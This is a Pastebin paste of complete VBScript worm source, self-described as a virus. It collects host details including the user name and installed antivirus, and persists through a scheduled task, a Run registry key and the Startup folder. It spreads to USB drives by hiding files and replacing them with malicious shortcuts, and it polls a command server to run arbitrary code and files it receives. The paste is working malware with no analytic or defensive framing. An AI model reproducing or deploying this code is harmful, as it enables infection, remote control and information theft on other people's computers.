Advertisement
FlyFar

Specware - A Simple and stupid VBScript virus

Jul 10th, 2023
2,187
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 4.87 KB | Cybersecurity | 0 0
  1. On error resume next
  2.  
  3. j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
  4. g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
  5. y = array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
  6.  
  7. function go(m)
  8.     if m = 4 then
  9.         T = "winmgmts:\\localhost\root\securitycenter"
  10.         Set B = GetObject(y(3)).InstancesOf(y(4))
  11.         for each a in b
  12.             go = a.displayName
  13.             exit for
  14.         next
  15.         Set B = GetObject(y(3) & "2").InstancesOf(y(4))
  16.         for each a in b
  17.             go = a.displayName
  18.             exit for
  19.         next
  20.         if go = "" then go = "Not-found"
  21.     else
  22.         Set B=GetObject(y(0)).InstancesOf(y(m))
  23.         for each a in b
  24.             if m = 1 then
  25.                 go = a.volumeserialnumber
  26.             elseif m = 2 then
  27.                 go = a.caption
  28.             end if
  29.             exit for
  30.         next
  31.     end if
  32. end function
  33.  
  34. set w = WScript
  35. set sh = Cr(0)
  36. set fs = Cr(1)
  37.  
  38. Function Cr(N)
  39.     Set Cr = CreateObject(j(N))
  40. End Function
  41.  
  42. function Ex(s)
  43.     Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
  44. end function
  45.  
  46. function Pt(C,A)
  47.     Pt = ""
  48.     Set X = Cr(3)
  49.     X.Open "POST", "http://127.0.0.1:7776/" & C, false
  50.     X.setrequestheader "User-Agent:", nf
  51.     X.send A
  52.     Pt = X.responsetext
  53. end function
  54.  
  55. Function nf
  56.     nf = ""
  57.     i = go(1)
  58.     s = VN & "_" & i
  59.     nf = nf & s & c
  60.     s = ex("COMPUTERNAME")
  61.     nf = nf & s & c
  62.     s = ex("USERNAME")
  63.     nf = nf & s & c
  64.     s = go(2)
  65.     nf = nf & s & c
  66.     s = go(4)
  67.     nf = nf & s & c & c & nt & c & u & c
  68. End Function
  69.  
  70. Sub Ns
  71.     on error resume next
  72.     dr = ex("TEMP") & C & wn
  73.     fs.CopyFile fu, dr, true
  74.     sh.run "schtasks /create /sc minute /mo 30 /tn ScheduleName /tr " & ChrW(34) & dr, false
  75.     sh.regwrite g(0) & g(3) & "HX4RQM4N8B", Ch & dr & Ch, g(5)
  76.     fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path & C & wn ,true
  77. end Sub
  78.  
  79. dr = ex("TEMP") & C & wn
  80.  
  81. sub spr
  82.     on error resume next
  83.     for each dr in fs.drives
  84.         dp=dr.path & c
  85.         if dr.isready = true then
  86.             if dr.drivetype = 1 then
  87.                 fs.copyfile fu,dp & wn,true
  88.                 if fs.fileexists(dp & wn) then
  89.                     fs.getfile(dp & wn).attributes = 2 + 4
  90.                 end if
  91.                 for each fi in fs.getfolder(dp).files
  92.                     if instr(fi.name,".") then
  93.                         if lcase(split(fi.name,".") (ubound(split(fi.name,".")))) <>"lnk" then
  94.                             fi.attributes = 2 + 4
  95.                             if ucase(fi.name) <> ucase(wn) then
  96.                                 with sh.createshortcut(dp  & split(fi.name,".")(0) & ".lnk")
  97.                                     .windowstyle = 7
  98.                                     .targetpath = "cmd.exe"
  99.                                     .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit"
  100.                                     fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6))
  101.                                     if instr(iconlocation,",") = 0 then
  102.                                         .iconlocation = fi.path
  103.                                     else
  104.                                         .iconlocation = fic
  105.                                     end if
  106.                                     .save()
  107.                                 end with
  108.                             end if
  109.                         end if
  110.                     end if
  111.                 next
  112.                 for each fo in fs.getfolder(dp).subfolders
  113.                     fo.attributes = 2 + 4
  114.                     with sh.createshortcut(dp & fo.name & ".lnk")
  115.                         .windowstyle = 7
  116.                         .targetpath = "cmd.exe"
  117.                         .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit"
  118.                         fic = sh.regread("HKLM\software\classes\folder" & g(6))
  119.                         if instr(.iconlocation,",") = 0 then
  120.                             .iconlocation=fo.path
  121.                         else
  122.                             .iconlocation=fic
  123.                         end if
  124.                         .save()
  125.                     end with
  126.                 next
  127.             end if
  128.         end if
  129.     next
  130.     err.clear
  131. end sub
  132.  
  133.  
  134.  
  135. vn = "vw0rm"
  136. U = ""
  137.  
  138. ch = chrw(34)
  139. c = chrw(92)
  140. fu = w.scriptfullname
  141. wn = w.scriptname
  142. NT = "No"
  143. if fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  144.     NT = "Yes"
  145. end if
  146.  
  147. U = sh.regread(g(2))
  148. if U = "" then
  149.     if mid(fu,2) = ":\" & wn then
  150.         U = "TRUE"
  151.         sh.regwrite g(2), U, g(5)
  152.     else
  153.         U = "FALSE"
  154.         sh.regwrite g(2), U, g(5)
  155.     end if
  156. end if
  157.  
  158. Ns
  159. spl = "|V|"
  160.  
  161. while true
  162.     s = split(Pt("Vre",""),spl)
  163.     select case s(0)
  164.         case "exc"
  165.             sa = s(1)
  166.             execute sa
  167.         case "Sc"
  168.             s2 = Ex("temp") & "\" & s(2)
  169.             set wr = fs.OpenTextFile(s2,2,True)
  170.             wr.Write s(1)
  171.             wr.Close()
  172.             sh.run s2, 6
  173.         case "RF"
  174.             s2 = Ex("temp") & "\" & s(2)
  175.             set wr = fs.OpenTextFile(s2,2,True)
  176.             wr.Write s(1)
  177.             wr.Close()
  178.             sh.run s2
  179.         case "Ren"
  180.             set wr = fs.OpenTextFile(fu,1)
  181.             f = wr.ReadAll
  182.             wr.close()
  183.             f = replace(f,ch&vn&ch,ch&s(1)&ch)
  184.             set wr = fs.OpenTextFile(fu,2,false)
  185.             wr.Write f
  186.             wr.close()
  187.         case "Up"
  188.             set wr = fs.OpenTextFile(fu,2,false)
  189.             s(1) = replace(s(1),"|U|","|V|")
  190.             wr.Write s(1)
  191.             wr.Close()
  192.             sh.run "wscript.exe //B " & ch & fu & ch, 6
  193.             w.quit
  194.         case "Cl"
  195.             W.quit
  196.         case "Un"
  197.             S(1) = replace(S(1),"%f",fu)
  198.             S(1) = replace(S(1),"%n",wn)
  199.             S(1) = replace(S(1),"%sfdr",dr)
  200.             execute S(1)
  201.             w.quit
  202.     end select
  203.     W.Sleep 6000
  204.     Spr
  205. wend
Tags: virus worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement